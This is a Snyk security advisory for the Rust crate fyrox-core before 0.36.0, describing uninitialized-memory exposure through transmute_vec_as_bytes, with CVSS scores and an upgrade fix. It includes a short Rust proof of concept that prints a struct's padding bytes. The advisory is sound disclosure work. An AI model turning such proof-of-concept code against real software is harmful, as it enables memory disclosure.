Upgrade SLES:15.5 cluster-md-kmp-default to version 5.14.21-150500.55.94.1 or higher.

Access of Uninitialized Pointer Affecting fyrox-core package, versions <0.36.0

Threat Intelligence

Proof of Concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk IDSNYK-RUST-FYROXCORE-8738844
published20 Feb 2025
disclosed19 Dec 2024
creditshinmao

Report a new vulnerability Found a mistake?

Introduced: 19 Dec 2024

CWE-824 (opens in a new tab)

How to fix?

Upgrade fyrox-core to version 0.36.0 or higher.

Overview

fyrox-core is a shared library for Fyrox-engine containing linear algebra and some useful algorithms.

Affected versions of this package are vulnerable to Access of Uninitialized Pointer via the transmute_vec_as_bytes function. An attacker can expose uninitialized memory by passing types with padding bytes, which are then cast to a u8 pointer.

PoC

use fyrox_core::transmute_vec_as_bytes;

#[derive(Copy, Clone)]
struct Pad {
    a: u8,
    b: u32,
    c: u8
}

fn main() {
    let pd = Pad { a: 0x1, b: 0x2, c: 0x3 };
    let mut v = Vec::new();
    v.push(pd);
    let fv = transmute_vec_as_bytes(v);
    println!("{:?}", fv);
}

References

CVSS Scores

version 4.0

version 3.1

Attack Vector (AV)
Local
Attack Complexity (AC)
Low
Attack Requirements (AT)
None
Privileges Required (PR)
None
User Interaction (UI)
None

Confidentiality (VC)
Low
Integrity (VI)
Low
Availability (VA)
Low

Confidentiality (SC)
None
Integrity (SI)
None
Availability (SA)
None